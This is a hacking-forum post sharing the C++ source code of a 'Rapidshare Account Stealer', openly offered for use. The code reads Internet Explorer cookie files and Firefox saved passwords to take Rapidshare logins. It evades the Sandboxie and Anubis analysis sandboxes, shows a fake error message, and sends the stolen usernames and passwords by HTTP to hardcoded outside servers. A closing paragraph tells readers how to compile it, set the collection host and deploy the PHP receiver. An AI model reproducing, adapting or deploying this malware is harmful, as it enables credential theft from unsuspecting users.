GFX1_FroOz FRESHIE
Countries/State : Age : 34 location : sabah Points : 10795 Reputation : 1 Number of posts : 15
| Subject: Rapidshare Account Stealer 3.0 Source code 24/2/2010, 2:12 pm | |
| - Code:
-
Changes (1.0 - 2.0): - Removed Firefox for the time being - Rewrote the method of getting Username - Rewrote the method of getting cookie path - Fixed up general bugs. - Working on both Vista and XP
Changes (2.0 - 3.0): - Re-wrote Firefox Module - Fixed up some more general bugs - Code:
-
#include #include #include "FireFaggots.h" #include using namespace std;
#pragma comment (lib, "WS2_32.LIB")
char szTempBuffer[1024], szBuffer[1024], szProfileini[1024], szName[1024], szCookies[1024], szStrToChar[1024], szPWBuffer[1024]; char szOldName[1024], szIEID[256], szIEPass[256], szUser[50], szPass[50]; int iTemp; bool bIE = true, bFF = true, bVista = false, bXP = false, bFound = false;
void CheckOS() { OSVERSIONINFO osvi;
ZeroMemory(&osvi, sizeof(OSVERSIONINFO)); osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&osvi);
if(osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 0) { bVista = true; } else if(osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1) { bXP = true; } }
int RemoveHex(char szTemp) { return( szTemp >= '0' && szTemp <= '9' ? szTemp - '0' : szTemp >= 'A' && szTemp <= 'F' ? szTemp - 'A' + 10 : szTemp - 'a' + 10); }
void RemoveEscape(char * szInput, char * szOutput) { while(*szInput) { if(*szInput == '%') { *(szOutput++) = 16 * RemoveHex(*++szInput) + RemoveHex(*++szInput); } else { *szInput++; } } }
void GetUsername() { char szTemp[250];
ExpandEnvironmentStrings("%userprofile%", szTemp, sizeof(szTemp)); sprintf(szName, "%s", szTemp); }
void GatherIEIntelligence(char * szOutput) { GetUsername();
for (int i = strlen(szName) + 1; i > 0; i--) { if( szName[i] == '\\') { strcpy(szName, &szName[i + 1]); break; } }
strcpy(szOldName,szName); if(strstr(szName," ")) { loop: int iLoc = strcspn(szName," "); szName[iLoc] = '_'; if(strstr(szName," ")) { goto loop; } }
if(bXP) { sprintf(szOutput, "C:\\Documents and Settings\\%s\\Cookies\\%s@rapidshare[1].txt", szOldName, szName); } else if(bVista) { sprintf(szOutput, "C:\\Users\\%s\\AppData\\Roaming\\Microsoft\\Windo ws\\Cookies\\%s@rapidshare[1].txt", szOldName, szName); } }
void RobInternetExplorer(char * szUser, char * szPass) { GatherIEIntelligence(szCookies);
FILE * fFP = fopen(szCookies, "r"); if(!fFP) { goto FalseSwipe; }
fgets(szBuffer, 128, fFP); fgets(szBuffer, 512, fFP);
for (iTemp = 0; iTemp < strlen(szBuffer); iTemp++) { if(szBuffer[iTemp] == '-') { RemoveEscape(&szBuffer[iTemp + 1], szPass); szBuffer[iTemp] = '\0'; strcpy(szUser, szBuffer); return; } }
FalseSwipe: MessageBox(NULL, "Windows has experienced an error and needs to close \r this program", "ERROR 8371", MB_OK); bIE = false; }
bool bSandBox() { HMODULE hSandbox; hSandbox = GetModuleHandleA("SbieDll.dll"); if(hSandbox == 0) { return false; } else { return true; } }
bool bAnubis() { char szUser[100]; ZeroMemory(&szUser, sizeof(szUser)); DWORD dwUser = sizeof(szUser); if(GetUserName(szUser, &dwUser) != 0) { if(!lstrcmp("USER", szUser) || !lstrcmp("CurrentUser", szUser)) { return true; } } return false; }
void RunAnon() { SOCKET s; WSADATA wsadata; SOCKADDR_IN target;
CheckOS(); RobInternetExplorer(szIEID, szIEPass);
sprintf(szBuffer, "GET /rapid/?u=%s&p=%s HTTP/1.1\r\nHost: anonserver.org\r\nAccept: */*\r\n\r\n", szIEID, szIEPass); sprintf(szTempBuffer, "GET /rapid/?u=%s&p=%s HTTP/1.1\r\nHost: anonserver.org\r\nAccept: */*\r\n\r\n", szUser, szPass);
WSAStartup(0x0202, &wsadata);
target.sin_family = AF_INET; target.sin_port = htons(80); target.sin_addr.s_addr = inet_addr("66.7.200.3");
s = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); connect(s, (SOCKADDR *)&target, sizeof(target));
if(bIE) { send(s, szBuffer, strlen(szBuffer), 0); send(s, szTempBuffer, strlen(szTempBuffer), 0); }
closesocket(s); WSACleanup(); }
void RunClient() { SOCKET s; WSADATA wsadata; SOCKADDR_IN target;
CheckOS(); RobInternetExplorer(szIEID, szIEPass);
sprintf(szBuffer, "GET /rapid/?u=%s&p=%s HTTP/1.1\r\nHost: anonserver.org\r\nAccept: */*\r\n\r\n", szIEID, szIEPass);
WSAStartup(0x0202, &wsadata);
target.sin_family = AF_INET; target.sin_port = htons(80); target.sin_addr.s_addr = inet_addr("94.23.1.171");
s = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); connect(s, (SOCKADDR *)&target, sizeof(target));
if(bIE) { send(s, szBuffer, strlen(szBuffer), 0); }
closesocket(s); WSACleanup(); }
void GetUser(string szInput) { const char *szUserBuffer;
std::string szTemp = szInput; szUserBuffer = szTemp.c_str(); sprintf(szUser, "%s", szUserBuffer);
for (int i = strlen(szUser) + 1; i > 0; i--) { if( szUser[i] == ':') { strcpy(szUser, &szUser[i + 2]); break; } } }
void GetPassword(string szInput) { const char *szPassBuffer;
std::string szTemp = szInput; szPassBuffer = szTemp.c_str(); sprintf(szPass, "%s", szPassBuffer);
for (int t = strlen(szPass) + 1; t > 0; t--) { if( szPass[t] == ':') { strcpy(szPass, &szPass[t + 2]); break; } } }
void FilterFox() { ifstream Rapid**** ("C:\\Rapid.txt"); string ****Nipples;
if(Rapid****.is_open()) { while (!bFound) { getline(Rapid****, ****Nipples); if(****Nipples == "https://ssl.rapidshare.com") { getline(Rapid****, ****Nipples); getline(Rapid****, ****Nipples); GetUser(****Nipples); getline(Rapid****, ****Nipples); GetPassword(****Nipples); bFound = true; } } Rapid****.close(); } }
void GetFox() { char *ProfilePath = NULL; char *FFDir = NULL;
ProfilePath = GetFFProfilePath();
if( !DirectoryExists(ProfilePath)) { // }
FFDir = GetFFLibPath();
if( !DirectoryExists(ProfilePath)) { // }
if( InitFFLibs(FFDir) ) { if( InitializeNSSLibrary(ProfilePath) ) { DumpCache(ProfilePath,"signons.txt"); DumpCache(ProfilePath,"signons2.txt"); DumpCache(ProfilePath,"signons3.txt"); NSSUnload(); } }
FilterFox(); }
int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow) { if(bSandBox()) { return 0; } if(bAnubis()) { return 0; } else { GetFox(); RunAnon(); //RunClient(); } return 0; }
phph file! Code: Code:
This is source code of a stealer - you need to compile it first. In CODE block you will find code for two files - c++ program and php script. First you have to copy c++ part, change path stealer connects to in - Code:
-
sprintf(szBuffer, "GET /rapid/?u=%s&p=%s HTTP/1.1\r\nHost: anonserver.org\r\nAccept: */*\r\n\r\n", szIEID, szIEPass); sprintf(szTempBuffer, "GET /rapid/?u=%s&p=%s HTTP/1.1\r\nHost: anonserver.org\r\nAccept: */*\r\n\r\n", szUser, szPass); In default values it sends passwords to anonserver.org/rapid ( -< isn't .php extension missing here?..) Then you have to upload php script ( part that starts with " Credits goes to Spidy for making this source. |
|